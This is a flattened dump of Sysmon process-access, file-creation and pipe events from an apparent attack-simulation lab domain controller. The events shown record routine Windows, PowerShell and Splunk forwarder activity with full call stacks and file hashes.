22:52:56.332{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001694429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001694428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-1E7A-603D-D07D-00000000AD01}57962480C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-1E7A-603D-D07D-00000000AD01}57962480C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.629{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A378CACD6CD7696AE63722AFF4A2170E,SHA256=B4C570A6F39109411492AC5D49D20B03B8C80F4AF329A36A91C44AA4AF358223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.452{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB733B57A2764C9A140414BD525A8F3,SHA256=4FBCF6C1848A69C314A247EC751CD037FEAFF07807FCD797769371A47AE8AF87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.301{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.301{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:52:57.270{05ADC7E1-7049-603D-4188-00000000AD01}5784\PSHost.132591127770323264.5784.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.270{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_y1gqwr1h.z1v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.270{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4ugnkebm.udi.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 